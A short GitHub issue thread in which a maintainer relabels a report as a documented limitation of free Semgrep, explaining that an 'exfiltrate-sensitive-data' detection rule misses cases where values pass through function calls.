christophetd
commented
1 year ago Renaming/labeling as this is not a bug but a documented limitation of the free version of Semgrep.
Open enelli opened 2 years ago
christophetd
commented
1 year ago Renaming/labeling as this is not a bug but a documented limitation of the free version of Semgrep.
Deep Semgrep is needed to propagate values through function calls. An example of this is found in the exfiltrate-sensitive-data tests (ctx). It can also be seen here: https://semgrep.dev/s/enelli:exfiltrate-sensitive-data. The first case is not detected, but the second case that has only one function is caught.